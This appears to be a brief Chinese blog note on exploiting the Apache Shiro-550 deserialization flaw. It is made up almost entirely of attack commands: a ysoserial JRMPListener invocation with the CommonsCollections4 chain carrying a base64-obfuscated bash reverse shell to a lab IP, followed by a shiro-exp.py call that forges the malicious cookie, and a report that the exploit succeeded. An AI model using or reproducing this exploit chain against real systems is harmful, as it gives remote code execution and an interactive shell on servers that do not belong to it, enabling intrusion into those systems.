Shiro漏洞整理
Shiro-550
0x00 发现漏洞
发现shiro
登录页面
0x01
尝试利用
使用ysoserial.jar
1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzOC85OTg4IDA+JjE=}|{base64,-d}|{bash,-i}"
然后生成cookie
1
python shiro-exp.py 192.168.79.1:10998
监听
设置cookie 发包
发现利用成功
Shiro漏洞整理
https://tsy244.github.io/2024/02/13/整理/Shiro漏洞整理/